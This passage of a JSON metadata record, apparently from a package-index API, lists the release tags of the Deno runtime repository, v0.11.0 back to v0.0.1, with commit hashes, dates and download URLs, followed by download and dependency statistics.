github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T01:53:11.057Z","dependent_packages_count":1,"downloads":855890,"downloads_period":"total","dependent_repos_count":2,"rankings":{"downloads":12.675918391947686,"dependent_repos_count":13.275356639562311,"dependent_packages_count":18.1541406361862,"stargazers_count":30.09055744478710